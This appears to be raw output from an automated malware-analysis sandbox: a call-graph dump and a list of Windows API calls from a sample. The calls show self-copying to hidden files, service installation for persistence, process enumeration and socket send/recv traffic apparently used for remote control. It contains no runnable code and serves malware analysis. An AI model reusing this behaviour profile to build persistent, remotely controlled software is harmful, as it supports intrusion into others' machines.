10040 14fcc5 GetCurrentProcess 10039->10040 10041 14fcdc 10039->10041 10040->10041 10041->9685 10042 14f0d0 GetWindowsDirectoryA 10041->10042 10043 14f122 10042->10043 10044 142f90 2 API calls 
10043->10044 10045 14f1d3 10043->10045 10046 14f170 10044->10046 10045->9675 10047 151bb0 2 API calls 10046->10047 10048 14f1bb 10047->10048 10071 14d500 lstrlen 10048->10071 10051 14d54a 10050->10051 10072 14fa50 10051->10072 10055 151d9d 10054->10055 10056 163110 WaitForSingleObject 10055->10056 10057 151e0c 10056->10057 10058 151e23 10057->10058 10059 151e4c CreateFileA 10057->10059 10060 16fcc0 ReleaseMutex 10058->10060 10061 151e93 10059->10061 10065 151ed1 10059->10065 10062 151e39 10060->10062 10063 16fcc0 ReleaseMutex 10061->10063 10062->9684 10064 151eaf 10063->10064 10064->9684 10066 151fe8 WriteFile 10065->10066 10066->10065 10067 152069 FindCloseChangeNotification 10066->10067 10105 16fcc0 10067->10105 10070->9744 10071->10045 10073 14fa7e 10072->10073 10078 14d500 lstrlen 10073->10078 10075 14fae4 10079 152df0 10075->10079 10077 14d55f 10077->9677 10078->10075 10082 15bff0 10079->10082 10081 152e3e 10081->10077 10083 15c006 10082->10083 10084 15c00d 10083->10084 10087 163f00 10083->10087 10084->10081 10086 15c04f 10086->10081 10088 163f30 10087->10088 10089 163f46 10088->10089 10091 150110 10088->10091 10089->10086 10092 150128 10091->10092 10093 15038a 10092->10093 10094 150266 10092->10094 10097 150367 10092->10097 10100 1568d0 10093->10100 10096 14e2c0 2 API calls 10094->10096 10098 150276 10096->10098 10097->10089 10099 152eb0 2 API calls 10098->10099 10099->10097 10101 156901 10100->10101 10102 156966 GetProcessHeap HeapAlloc 10101->10102 10103 156926 GetProcessHeap RtlReAllocateHeap 10101->10103 10102->10097 10103->10097 10106 16fce5 ReleaseMutex 10105->10106 10107 16fcdb 10105->10107 10108 1520a1 10106->10108 10107->10106 10108->9684 10109->9768 10110->9787 10112 14caa0 10111->10112 10113 14cae7 CreateFileA 10112->10113 10114 14cb3d ReadFile 10113->10114 10118 14cf5d 10113->10118 10115 14cbbc CloseHandle 10114->10115 10116 14cb79 10114->10116 10140 152a20 10115->10140 10116->10115 10118->9833 10119 14cbf5 GetTickCount 10142 171520 10119->10142 
10121 14cc2a 10146 14d500 lstrlen 10121->10146 10123 14cc81 10124 142f90 2 API calls 10123->10124 10125 14ccd1 10124->10125 10126 151bb0 2 API calls 10125->10126 10127 14cd00 10126->10127 10129 142f90 2 API calls 10127->10129 10130 14cddc CreateFileA 10127->10130 10132 14cd54 10129->10132 10130->10118 10131 14cef5 WriteFile 10130->10131 10133 14cf46 CloseHandle 10131->10133 10134 14cf32 10131->10134 10147 14d500 lstrlen 10132->10147 10133->10118 10134->10133 10136 14cd6c 10137 175820 wvsprintfA 10136->10137 10138 14cd77 10137->10138 10139 151bb0 2 API calls 10138->10139 10139->10130 10141 152a3b 10140->10141 10141->10119 10143 171546 10142->10143 10148 14d500 lstrlen 10143->10148 10145 1715bf 10145->10121 10146->10123 10147->10136 10148->10145 10149->9839 10151 154290 8 API calls 10150->10151 10152 152c4d 10151->10152 10152->9865 10154 15a998 10153->10154 10155 142f90 2 API calls 10154->10155 10156 15aa6c 10155->10156 10157 151bb0 2 API calls 10156->10157 10158 15aab7 GetProcessHeap 10157->10158 10159 15ab54 10158->10159 10160 15aaeb 10158->10160 10161 142f90 2 API calls 10159->10161 10160->9867 10162 15ab6a LoadLibraryA 10161->10162 10163 15abb1 10162->10163 10164 151bb0 2 API calls 10163->10164 10166 15abcb 10164->10166 10165 15abf6 10165->9867 10166->10165 10167 142f90 2 API calls 10166->10167 10168 15ac99 GetProcAddress 10167->10168 10169 151bb0 2 API calls 10168->10169 10170 15acd9 10169->10170 10171 15acf0 FreeLibrary 10170->10171 10172 15ad28 HeapAlloc 10170->10172 10171->9867 10173 15ad78 10172->10173 10174 15ada4 FreeLibrary 10173->10174 10175 15adfa 10173->10175 10174->9867 10177 15ae30 HeapFree 10175->10177 10182 15af24 10175->10182 10178 15ae77 10177->10178 10179 15ae8a HeapAlloc 10177->10179 10178->10179 10180 15aeaa FreeLibrary 10179->10180 10179->10182 10181 15aedf 10180->10181 10181->9867 10184 142f90 2 API calls 10182->10184 10191 15b22b 10182->10191 10183 15b6ad HeapFree FreeLibrary 10183->9867 10185 15affe 10184->10185 10186 151bb0 2 API calls 
10185->10186 10187 15b074 10186->10187 10188 142f90 2 API calls 10187->10188 10187->10191 10189 15b249 10188->10189 10190 151bb0 2 API calls 10189->10190 10190->10191 10191->10183 10192->9869 10248 15a810 10193->10248 10196 171050 10197 171071 10196->10197 10198 154290 8 API calls 10197->10198 10199 17107f 10198->10199 10199->9873 10201 152f95 10200->10201 10202 142f90 2 API calls 10201->10202 10203 152fd0 10202->10203 10204 151bb0 2 API calls 10203->10204 10205 153030 10204->10205 10206 156600 10205->10206 10255 14d500 lstrlen 10206->10255 10208 156655 10208->9925 10210 1597e8 10209->10210 10211 142f90 2 API calls 10210->10211 10212 15987a 10211->10212 10213 142f90 2 API calls 10212->10213 10214 1598a9 10213->10214 10215 142f90 2 API calls 10214->10215 10216 1598d7 10215->10216 10217 151bb0 2 API calls 10216->10217 10218 159917 10217->10218 10219 142f90 2 API calls 10218->10219 10220 159955 10219->10220 10221 151bb0 2 API calls 10220->10221 10222 1599ab 10221->10222 10223 151bb0 2 API calls 10222->10223 10230 159a2b 10223->10230 10224 15a5a1 10225 151bb0 2 API calls 10224->10225 10228 15a606 10225->10228 10226 159f98 10226->10224 10227 15a428 10226->10227 10232 156810 8 API calls 10226->10232 10235 141ca0 9 API calls 10226->10235 10227->10224 10233 156810 8 API calls 10227->10233 10259 141ca0 10227->10259 10228->9937 10230->10226 10231 141ca0 9 API calls 10230->10231 10256 156810 10230->10256 10231->10230 10232->10226 10233->10227 10235->10226 10237 15bff0 8 API calls 10236->10237 10238 15d997 10237->10238 10238->9939 10240 1542e3 10239->10240 10241 15bff0 8 API calls 10240->10241 10242 15432f 10241->10242 10242->9941 10270 164450 10243->10270 10245 160589 10245->9943 10246 1604ab 10246->10245 10247 154290 8 API calls 10246->10247 10247->10245 10249 15a81c 10248->10249 10254 14d500 lstrlen 10249->10254 10251 15a8a0 10252 152df0 8 API calls 10251->10252 10253 15a8ac 10252->10253 10253->10196 10254->10251 10255->10208 10265 151c30 10256->10265 10258 15681e 
10258->10230 10260 14d5d0 10259->10260 10269 14d500 lstrlen 10260->10269 10262 14d630 10263 154290 8 API calls 10262->10263 10264 14d63c 10263->10264 10264->10227 10266 151c67 10265->10266 10267 15bff0 8 API calls 10266->10267 10268 151c89 10267->10268 10268->10258 10269->10262 10275 1700f0 10270->10275 10272 164475 10274 1644d7 10272->10274 10279 150920 10272->10279 10274->10246 10276 170149 10275->10276 10277 17010b 10275->10277 10276->10272 10278 15d990 8 API calls 10277->10278 10278->10276 10280 150945 10279->10280 10281 163110 WaitForSingleObject 10280->10281 10282 150a18 10281->10282 10283 142f90 2 API calls 10282->10283 10289 150b2c 10282->10289 10284 150a68 GetProcAddress 10283->10284 10285 150aa7 10284->10285 10286 142f90 2 API calls 10285->10286 10287 150ad3 10286->10287 10290 151bb0 2 API calls 10287->10290 10288 16fcc0 ReleaseMutex 10291 150d8e 10288->10291 10289->10288 10292 150ae7 GetProcAddress 10290->10292 10291->10272 10293 151bb0 2 API calls 10292->10293 10293->10289 10294->9947 10297 14d00d 10295->10297 10296 15d990 8 API calls 10298 14d0dd 10296->10298 10297->10296 10299 163110 WaitForSingleObject 10298->10299 10300 14d0f2 CreateFileA 10299->10300 10301 14d140 10300->10301 10302 14d131 10300->10302 10305 14d1b9 ReadFile 10301->10305 10306 150110 8 API calls 10301->10306 10307 14d3e3 CloseHandle 10301->10307 10308 154290 8 API calls 10301->10308 10309 14d294 CloseHandle 10301->10309 10303 16fcc0 ReleaseMutex 10302->10303 10304 14d410 10303->10304 10304->9963 10305->10301 10306->10301 10307->10302 10308->10301 10311 16fcc0 ReleaseMutex 10309->10311 10312 14d322 10311->10312 10312->9963 10313->9993 10315 151115 10314->10315 10316 151126 10314->10316 10315->10017 10317 151137 10316->10317 10318 15114e WriteFile 10316->10318 10317->10017 10318->10017 10320 1753d4 10319->10320 10320->10020 10366 14a830 10369 15b720 10366->10369 10368 14a83f 10370 15b72e 10369->10370 10373 14d500 lstrlen 10370->10373 10372 15b739 10372->10368 10373->10372 11000 174eb3 
11001 174ec5 11000->11001 11003 147a04 132 API calls 11001->11003 11002 174ec9 11003->11002 11185 141130 11186 14114b 11185->11186 11187 164420 8 API calls 11186->11187 11188 14115b 11187->11188 11189 14f330 11192 14d500 lstrlen 11189->11192 11191 14f38f 11192->11191 11193 14fb30 11194 152df0 8 API calls 11193->11194 11195 14fb55 11194->11195 11004 157eb0 11005 157ec0 11004->11005 11006 157eba 11004->11006 11007 152eb0 2 API calls 11006->11007 11007->11005 11008 15a0a6 11016 15a0b0 11008->11016 11009 156810 8 API calls 11009->11016 11010 15a5a1 11014 151bb0 2 API calls 11010->11014 11011 156810 8 API calls 11013 15a428 11011->11013 11012 141ca0 9 API calls 11012->11013 11013->11010 11013->11011 11013->11012 11017 15a606 11014->11017 11015 141ca0 9 API calls 11015->11016 11016->11009 11016->11013 11016->11015 11204 14ab27 11207 14ab30 11204->11207 11205 14acfe 11206 163a80 4 API calls 11206->11207 11207->11205 11207->11206 11208 143520 11209 14353f 11208->11209 11210 1568d0 4 API calls 11209->11210 11211 14355e 11209->11211 11210->11211 11258 15c9a0 11259 15c9be 11258->11259 11264 14d500 lstrlen 11259->11264 11261 15c9fd 11265 14df70 11261->11265 11264->11261 11268 160b70 11265->11268 11267 14df8a 11269 160baf 11268->11269 11270 160c9b 11269->11270 11272 160ca8 11269->11272 11271 1566f0 8 API calls 11270->11271 11274 160ca6 11271->11274 11273 14e320 8 API calls 11272->11273 11272->11274 11273->11274 11274->11267 11018 1622a0 11019 1622fb 11018->11019 11020 1750e0 3 API calls 11019->11020 11021 16247d 11020->11021 11022 169580 10 API calls 11021->11022 11023 1624c2 11022->11023 11024 14e430 lstrlen 11023->11024 11025 1624e6 11024->11025 11026 142f90 2 API calls 11025->11026 11027 162511 11026->11027 11028 151bb0 2 API calls 11027->11028 11035 162561 11028->11035 11029 151200 12 API calls 11029->11035 11030 15d990 8 API calls 11031 162bec Sleep 11030->11031 11047 158cf0 11031->11047 11033 152120 5 API calls 11033->11035 11034 1708b0 GetSystemTimeAsFileTime 
11034->11035 11035->11029 11035->11030 11035->11033 11035->11034 11036 16fa80 3 API calls 11035->11036 11037 164af0 4 API calls 11035->11037 11038 160d80 22 API calls 11035->11038 11039 151bb0 GetProcessHeap RtlFreeHeap 11035->11039 11040 14d760 51 API calls 11035->11040 11041 14d530 9 API calls 11035->11041 11042 152c30 8 API calls 11035->11042 11043 15c770 8 API calls 11035->11043 11044 171050 8 API calls 11035->11044 11045 142f90 GetProcessHeap RtlAllocateHeap 11035->11045 11046 15d0f0 31 API calls 11035->11046 11036->11035 11037->11035 11038->11035 11039->11035 11040->11035 11041->11035 11042->11035 11043->11035 11044->11035 11045->11035 11046->11035 11049 158d16 11047->11049 11048 158f44 11048->11035 11049->11048 11050 158dca DeleteFileA 11049->11050 11052 158ee8 11049->11052 11054 141c30 11049->11054 11050->11049 11052->11048 11059 157d40 11052->11059 11063 14f270 11054->11063 11056 141c6a 11067 15d720 11056->11067 11060 157d69 11059->11060 11062 157e27 11060->11062 11074 14bba0 11060->11074 11062->11052 11064 14f29a 11063->11064 11065 150110 8 API calls 11064->11065 11066 14f2a2 11065->11066 11066->11056 11068 15d72e 11067->11068 11069 141c70 11068->11069 11071 152a80 11068->11071 11069->11049 11072 14e100 8 API calls 11071->11072 11073 152a8f 11072->11073 11073->11069 11077 1630b0 11074->11077 11078 1630e4 11077->11078 11079 1566f0 8 API calls 11078->11079 11080 14bbae 11079->11080 11080->11062 10321 1645a9 10322 1645bd 10321->10322 10327 160610 10322->10327 10326 1645ee 10328 16062b 10327->10328 10334 14b690 10328->10334 10330 160660 10331 16fde0 10330->10331 10332 16fdf7 10331->10332 10333 16fe12 GetStdHandle GetStdHandle GetStdHandle 10331->10333 10332->10333 10333->10326 10335 14b6b6 GetProcessHeap HeapAlloc 10334->10335 10335->10330 11212 174f57 11213 174ec5 11212->11213 11213->11212 11214 174f77 11213->11214 11216 147a04 132 API calls 11213->11216 11215 174ec9 11216->11215 11081 15fcd7 11094 15f850 11081->11094 11082 168b60 GetProcessHeap 
RtlAllocateHeap GetProcessHeap RtlFreeHeap 11082->11094 11083 141170 2 API calls 11084 160425 11083->11084 11085 158bf0 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 11085->11094 11086 16ab60 4 API calls 11086->11094 11087 152c90 4 API calls 11087->11094 11088 16024a 11090 152c90 4 API calls 11088->11090 11091 160299 11088->11091 11089 171190 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 11089->11094 11090->11091 11093 152c90 4 API calls 11091->11093 11095 160368 11091->11095 11092 160790 4 API calls 11092->11094 11093->11095 11094->11082 11094->11085 11094->11086 11094->11087 11094->11088 11094->11089 11094->11092 11094->11095 11095->11083 11096 142cd0 11101 151cc0 11096->11101 11108 16b450 11101->11108 11109 16b46a 11108->11109 11110 1700f0 8 API calls 11109->11110 11111 16b49b 11110->11111 11112 1428d0 11113 1428e7 11112->11113 11115 142903 11112->11115 11114 142935 11115->11114 11116 142a46 ReadFile 11115->11116 11117 142a61 11116->11117 11118 14fed0 11119 14feeb 11118->11119 11120 14bb70 8 API calls 11119->11120 11121 14ff10 11120->11121 11124 163080 11121->11124 11125 16308e 11124->11125 11126 154290 8 API calls 11125->11126 11127 14ff27 11126->11127 11275 14f9d0 11276 14f9e6 11275->11276 11279 163c50 11276->11279 11278 14fa49 11280 163c6f 11279->11280 11281 14e320 8 API calls 11280->11281 11282 163c86 11281->11282 11282->11278 11128 160ad0 11131 14b780 11128->11131 11134 15d750 11131->11134 11135 15d77e 11134->11135 11136 15d75a 11134->11136 11137 152eb0 2 API calls 11136->11137 11137->11135 11283 160fd8 11285 160fe0 11283->11285 11381 14d500 lstrlen 11285->11381 11286 16110c 11382 14d500 lstrlen 11286->11382 11288 162250 11289 16111a 11289->11288 11290 142f90 2 API calls 11289->11290 11291 161195 11290->11291 11292 14d530 9 API calls 11291->11292 11293 1611c3 11292->11293 11294 151bb0 2 API calls 11293->11294 11295 1611d5 11294->11295 11297 142f90 2 API calls 11295->11297 11324 16134c 11295->11324 11296 1701a0 9 API calls 11298 
1613d8 11296->11298 11299 161226 11297->11299 11300 171050 8 API calls 11298->11300 11302 15a810 9 API calls 11299->11302 11301 1613e4 11300->11301 11303 142f90 2 API calls 11301->11303 11305 161258 11302->11305 11304 161422 11303->11304 11306 1701a0 9 API calls 11304->11306 11307 151bb0 2 API calls 11305->11307 11308 16144a 11306->11308 11311 161288 11307->11311 11309 171050 8 API calls 11308->11309 11310 161456 11309->11310 11313 151bb0 2 API calls 11310->11313 11312 16b500 8 API calls 11311->11312 11311->11324 11315 1612fa 11312->11315 11314 161478 11313->11314 11318 1701a0 9 API calls 11314->11318 11316 142f90 2 API calls 11315->11316 11317 161310 11316->11317 11319 14d530 9 API calls 11317->11319 11320 1614e2 11318->11320 11321 161328 11319->11321 11322 171050 8 API calls 11320->11322 11323 151bb0 2 API calls 11321->11323 11325 1614f1 11322->11325 11323->11324 11324->11296 11329 142f90 2 API calls 11325->11329 11364 1616c2 11325->11364 11326 142f90 2 API calls 11327 161702 11326->11327 11328 1701a0 9 API calls 11327->11328 11331 161728 11328->11331 11330 161595 11329->11330 11332 1701a0 9 API calls 11330->11332 11333 171050 8 API calls 11331->11333 11334 1615d0 11332->11334 11335 161734 11333->11335 11336 171050 8 API calls 11334->11336 11338 151bb0 2 API calls 11335->11338 11337 1615df 11336->11337 11341 142f90 2 API calls 11337->11341 11339 16174e 11338->11339 11340 161786 socket 11339->11340 11342 171050 8 API calls 11339->11342 11343 1617b2 11340->11343 11344 1617de 11340->11344 11345 161600 11341->11345 11342->11340 11346 1618c4 gethostbyname 11344->11346 11347 1617fb setsockopt 11344->11347 11348 151bb0 2 API calls 11345->11348 11346->11288 11351 1618ed inet_ntoa inet_addr htons connect 11346->11351 11349 161866 11347->11349 11350 161628 11348->11350 11349->11346 11354 175820 wvsprintfA 11350->11354 11353 1619ca 11351->11353 11356 1619e0 11351->11356 11355 16165e 11354->11355 11357 151bb0 2 API calls 11355->11357 11359 161a00 send 11356->11359 11358 
16167a 11357->11358 11360 1701a0 9 API calls 11358->11360 11363 161a1e 11359->11363 11361 1616b3 11360->11361 11362 171050 8 API calls 11361->11362 11362->11364 11365 15d990 8 API calls 11363->11365 11367 161a3e 11363->11367 11364->11326 11366 161add recv 11365->11366 11368 1621ad closesocket 11366->11368 11379 161b57 11366->11379 11370 162210 11368->11370 11369 141df0 GetSystemTimeAsFileTime 11369->11379 11370->11288 11371 16b500 8 API calls 11370->11371 11371->11288 11372 150110 8 API calls 11372->11379 11373 154290 8 API calls 11373->11379 11374 162135 recv 11375 162187 11374->11375 11374->11379 11375->11368 11376 14c110 9 API calls 11376->11379 11377 142f90 GetProcessHeap RtlAllocateHeap 11377->11379 11378 15a810 9 API calls 11378->11379 11379->11368 11379->11369 11379->11372 11379->11373 11379->11374 11379->11375 11379->11376 11379->11377 11379->11378 11380 151bb0 GetProcessHeap RtlFreeHeap 11379->11380 11380->11379 11381->11286 11382->11289 11383 14a5c0 11384 15d990 8 API calls 11383->11384 11385 14a600 11384->11385 11390 142b40 11385->11390 11387 14a61d 11388 15d990 8 API calls 11387->11388 11389 14a6ac 11388->11389 11391 142b51 11390->11391 11392 164420 8 API calls 11391->11392 11393 142b61 11392->11393 11393->11387 10378 15ca40 10379 15ca62 10378->10379 10434 1649b0 10379->10434 10381 15cb32 10384 15d03e 10381->10384 10438 164af0 10381->10438 10385 142f90 2 API calls 10386 15cc2c 10385->10386 10387 14d530 9 API calls 10386->10387 10388 15cc44 10387->10388 10389 151bb0 2 API calls 10388->10389 10390 15cc6b 10389->10390 10450 142f00 10390->10450 10395 171050 8 API calls 10396 15cccb 10395->10396 10397 142f90 2 API calls 10396->10397 10398 15ccf4 10397->10398 10399 1701a0 9 API calls 10398->10399 10400 15cd19 10399->10400 10401 171050 8 API calls 10400->10401 10402 15cd25 10401->10402 10403 151bb0 2 API calls 10402->10403 10404 15cd47 10403->10404 10456 15c770 10404->10456 10406 15cd7b 10407 171050 8 API calls 10406->10407 10408 15cd84 10407->10408 10409 
16b500 8 API calls 10408->10409 10410 15cdb4 10409->10410 10460 14e550 10410->10460 10412 15cde5 10413 1597b0 9 API calls 10412->10413 10414 15ce25 10413->10414 10518 15bf40 10414->10518 10417 142f90 2 API calls 10418 15ce9c 10417->10418 10419 1701a0 9 API calls 10418->10419 10420 15cec2 10419->10420 10421 171050 8 API calls 10420->10421 10422 15cece 10421->10422 10423 151bb0 2 API calls 10422->10423 10424 15cf08 10423->10424 10425 154290 8 API calls 10424->10425 10426 15cf34 10425->10426 10427 15d990 8 API calls 10426->10427 10428 15cfb2 10427->10428 10429 142f90 2 API calls 10428->10429 10430 15cfd0 10429->10430 10522 160d80 10430->10522 10432 15d029 10433 151bb0 2 API calls 10432->10433 10433->10384 10435 154290 8 API calls 10434->10435 10437 1649e4 SetEvent 10435->10437 10437->10381 10439 164b32 10438->10439 10440 142f90 2 API calls 10439->10440 10441 164b55 10440->10441 10442 142f90 2 API calls 10441->10442 10443 164b78 10442->10443 10625 1571e0 10443->10625 10445 164b93 10446 151bb0 2 API calls 10445->10446 10447 164bb0 10446->10447 10448 151bb0 2 API calls 10447->10448 10449 15cc06 10448->10449 10449->10385 10631 1508d0 10450->10631 10452 142f17 10453 164df0 10452->10453 10643 14e100 10453->10643 10455 15ccbf 10455->10395 10457 15c79b 10456->10457 10458 154290 8 API calls 10457->10458 10459 15c86a 10457->10459 10458->10459 10459->10406 10461 14e5ad 10460->10461 10462 142f90 2 API calls 10461->10462 10467 14e6cb 10461->10467 10463 14e689 10462->10463 10464 14d530 9 API calls 10463->10464 10465 14e6a0 10464->10465 10466 151bb0 2 API calls 10465->10466 10466->10467 10468 14e7e1 10467->10468 10469 14e77f 10467->10469 10472 142f90 2 API calls 10468->10472 10470 142f90 2 API calls 10469->10470 10471 14e795 10470->10471 10473 14d530 9 API calls 10471->10473 10474 14e819 10472->10474 10475 14e7ac 10473->10475 10651 16f500 10474->10651 10476 151bb0 2 API calls 10475->10476 10477 14e7c5 10476->10477 10477->10412 10480 151bb0 2 API calls 10481 14e893 10480->10481 10482 
14e8bf 10481->10482 10483 14e9a8 10481->10483 10485 142f90 2 API calls 10482->10485 10663 15d820 10483->10663 10487 14e924 10485->10487 10493 14d530 9 API calls 10487->10493 10488 14e9d6 10491 142f90 2 API calls 10488->10491 10489 14ea7f 10490 1648d0 lstrlen 10489->10490 10496 14eac3 10490->10496 10492 14e9fb 10491->10492 10494 14d530 9 API calls 10492->10494 10495 14e96c 10493->10495 10497 14ea36 10494->10497 10498 151bb0 2 API calls 10495->10498 10667 14ff90 10496->10667 10500 151bb0 2 API calls 10497->10500 10501 14e994 10498->10501 10503 14ea49 10500->10503 10501->10412 10503->10412 10506 142f90 2 API calls 10507 14eb9a 10506->10507 10508 151bb0 2 API calls 10507->10508 10509 14ebe8 10508->10509 10675 14d500 lstrlen 10509->10675 10511 14ec14 10512 151d90 5 API calls 10511->10512 10513 14ec47 10512->10513 10676 158200 10513->10676 10517 14ed7c 10517->10412 10519 15bf63 10518->10519 10520 164420 8 API calls 10519->10520 10521 15bf73 10520->10521 10521->10417 10523 160d9a 10522->10523 10524 1708b0 GetSystemTimeAsFileTime 10523->10524 10525 160f04 10524->10525 10918 14d500 lstrlen 10525->10918 10527 160f89 10527->10432 10529 16110c 10920 14d500 lstrlen 10529->10920 10531 160f6d 10531->10527 10919 14d500 lstrlen 10531->10919 10532 162250 10532->10432 10533 16111a 10533->10532 10534 142f90 2 API calls 10533->10534 10535 161195 10534->10535 10536 14d530 9 API calls 10535->10536 10537 1611c3 10536->10537 10538 151bb0 2 API calls 10537->10538 10539 1611d5 10538->10539 10541 142f90 2 API calls 10539->10541 10568 16134c 10539->10568 10540 1701a0 9 API calls 10542 1613d8 10540->10542 10543 161226 10541->10543 10544 171050 8 API calls 10542->10544 10546 15a810 9 API calls 10543->10546 10545 1613e4 10544->10545 10547 142f90 2 API calls 10545->10547 10549 161258 10546->10549 10548 161422 10547->10548 10550 1701a0 9 API calls 10548->10550 10551 151bb0 2 API calls 10549->10551 10552 16144a 10550->10552 10555 161288 10551->10555 10553 171050 8 API calls 10552->10553 10554 161456 
10553->10554 10557 151bb0 2 API calls 10554->10557 10556 16b500 8 API calls 10555->10556 10555->10568 10559 1612fa 10556->10559 10558 161478 10557->10558 10562 1701a0 9 API calls 10558->10562 10560 142f90 2 API calls 10559->10560 10561 161310 10560->10561 10563 14d530 9 API calls 10561->10563 10564 1614e2 10562->10564 10565 161328 10563->10565 10566 171050 8 API calls 10564->10566 10567 151bb0 2 API calls 10565->10567 10569 1614f1 10566->10569 10567->10568 10568->10540 10573 142f90 2 API calls 10569->10573 10608 1616c2 10569->10608 10570 142f90 2 API calls 10571 161702 10570->10571 10572 1701a0 9 API calls 10571->10572 10575 161728 10572->10575 10574 161595 10573->10574 10576 1701a0 9 API calls 10574->10576 10577 171050 8 API calls 10575->10577 10578 1615d0 10576->10578 10579 161734 10577->10579 10580 171050 8 API calls 10578->10580 10582 151bb0 2 API calls 10579->10582 10581 1615df 10580->10581 10585 142f90 2 API calls 10581->10585 10583 16174e 10582->10583 10584 161786 socket 10583->10584 10586 171050 8 API calls 10583->10586 10587 1617b2 10584->10587 10588 1617de 10584->10588 10589 161600 10585->10589 10586->10584 10587->10432 10590 1618c4 gethostbyname 10588->10590 10591 1617fb setsockopt 10588->10591 10592 151bb0 2 API calls 10589->10592 10590->10532 10595 1618ed inet_ntoa inet_addr htons connect 10590->10595 10593 161866 10591->10593 10594 161628 10592->10594 10593->10590 10598 175820 wvsprintfA 10594->10598 10597 1619ca 10595->10597 10600 1619e0 10595->10600 10597->10432 10599 16165e 10598->10599 10601 151bb0 2 API calls 10599->10601 10603 161a00 send 10600->10603 10602 16167a 10601->10602 10604 1701a0 9 API calls 10602->10604 10607 161a1e 10603->10607 10605 1616b3 10604->10605 10606 171050 8 API calls 10605->10606 10606->10608 10609 15d990 8 API calls 10607->10609 10611 161a3e 10607->10611 10608->10570 10610 161add recv 10609->10610 10612 1621ad closesocket 10610->10612 10624 161b57 10610->10624 10611->10432 10614 162210 10612->10614 10614->10532 10615 
16b500 8 API calls 10614->10615 10615->10532 10616 150110 8 API calls 10616->10624 10617 154290 8 API calls 10617->10624 10618 142f90 GetProcessHeap RtlAllocateHeap 10618->10624 10619 162135 recv 10620 162187 10619->10620 10619->10624 10620->10612 10621 151bb0 GetProcessHeap RtlFreeHeap 10621->10624 10623 15a810 9 API calls 10623->10624 10624->10612 10624->10616 10624->10617 10624->10618 10624->10619 10624->10620 10624->10621 10624->10623 10921 141df0 10624->10921 10925 14c110 10624->10925 10626 157202 10625->10626 10627 142f90 2 API calls 10626->10627 10628 157648 10627->10628 10629 151bb0 2 API calls 10628->10629 10630 157684 10629->10630 10630->10445 10632 1508db 10631->10632 10635 157ed0 10632->10635 10636 157eec 10635->10636 10639 164420 10636->10639 10640 164434 10639->10640 10641 152df0 8 API calls 10640->10641 10642 1508fe 10641->10642 10642->10452 10644 14e111 10643->10644 10647 141000 10644->10647 10646 14e127 10646->10455 10648 14100b 10647->10648 10649 163f00 8 API calls 10648->10649 10650 141068 10649->10650 10650->10646 10652 16f5be 10651->10652 10661 14e83f 10652->10661 10700 1421f0 10652->10700 10656 16f77d 10657 16f6bd 10656->10657 10710 15dcf0 10656->10710 10730 142f20 10657->10730 10660 16f882 10718 170220 10660->10718 10661->10480 10664 15d83c GetModuleFileNameA 10663->10664 10666 14e9cb 10664->10666 10666->10488 10666->10489 10668 14ffcb 10667->10668 10669 150920 8 API calls 10668->10669 10670 14eaeb 10668->10670 10669->10670 10671 157ff0 10670->10671 10674 158035 10671->10674 10672 14eb0c 10672->10506 10673 14ff90 8 API calls 10673->10674 10674->10672 10674->10673 10675->10511 10677 15823e 10676->10677 10678 158465 CreatePipe 10677->10678 10679 158499 SetHandleInformation CreatePipe 10678->10679 10680 15848a 10678->10680 10683 1585cd SetHandleInformation 10679->10683 10684 15858a 10679->10684 10682 15d990 8 API calls 10680->10682 10685 14ed18 DeleteFileA 10680->10685 10682->10685 10688 15860f 10683->10688 10686 1587e3 CloseHandle 10684->10686 
APIs
• GetEnvironmentVariableA.KERNEL32(00000000,C:\Users\user,00000104), ref: 001483DA
• CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 00148448
• CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 001484DC
• CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 001484F7
• GetTickCount.KERNEL32 ref: 00148599
  • Part of subcall function 00155200: GetVersionExA.KERNEL32(001CAE70), ref: 001552CC
• Sleep.KERNEL32(00000D05), ref: 00148B70
• Sleep.KERNEL32(000007D0), ref: 00148DAC
• GetModuleFileNameA.KERNEL32(00000000,?,00000200), ref: 00148E86
• SetFileAttributesA.KERNEL32(?,00000080), ref: 00148E9F
• CopyFileA.KERNEL32(?,?,00000000), ref: 00148EC3
• SetFileAttributesA.KERNEL32(?,00000002), ref: 0014912B
• SetFileAttributesA.KERNEL32(?,00000080), ref: 00149186
• GetCommandLineA.KERNEL32 ref: 00149265
• GetModuleFileNameA.KERNEL32(00000000,?), ref: 00149370
  • Part of subcall function 0014A4E0: lstrlen.KERNEL32(?), ref: 0014A4FE
  • Part of subcall function 0014D500: lstrlen.KERNEL32(?,?,0014D630,?), ref: 0014D523
• MessageBoxA.USER32(00000000,00000004,00000005,?), ref: 001496D4
• CloseHandle.KERNEL32(FFFFFFFF), ref: 00149AC8
• SetFileAttributesA.KERNEL32(?,00000080), ref: 00149AEC
• CopyFileA.KERNEL32(?,?,00000000), ref: 00149B0C
• SetFileAttributesA.KERNEL32(?,00000002), ref: 00149B3B
• Sleep.KERNEL32(000003E8), ref: 00149C52
• Sleep.KERNEL32(000003E8), ref: 00148CB2
  • Part of subcall function 0014BBC0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0014BC90
  • Part of subcall function 0014BBC0: Process32First.KERNEL32(00000000,?), ref: 0014BCE3
• GetCommandLineA.KERNEL32 ref: 001486AE
  • Part of subcall function 00142800: ExitProcess.KERNEL32 ref: 00142842
  • Part of subcall function 001708B0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00170929
  • Part of subcall function 001708B0: __aulldiv.LIBCMT ref: 00170953
• Sleep.KERNEL32(000007D0), ref: 00149E32
• SetFileAttributesA.KERNEL32(0018D800,00000080), ref: 00149E88
• CopyFileA.KERNEL32(?,0018D800,00000000), ref: 00149EA6
• SetFileAttributesA.KERNEL32(0018D800,00000002), ref: 00149EC5
  • Part of subcall function 00150500: OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 00150537
  • Part of subcall function 00150500: CreateServiceA.ADVAPI32(00000000,012532A8,012532A8,000F01FF,00000110,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00150596
  • Part of subcall function 00150500: ChangeServiceConfig2A.ADVAPI32(00000000,00000001,?), ref: 00150615
  • Part of subcall function 00150500: StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 0015062A
• CreateThread.KERNEL32(00000000,00000000,Function_000222A0,00000000,00000000,00000000), ref: 0014A26A
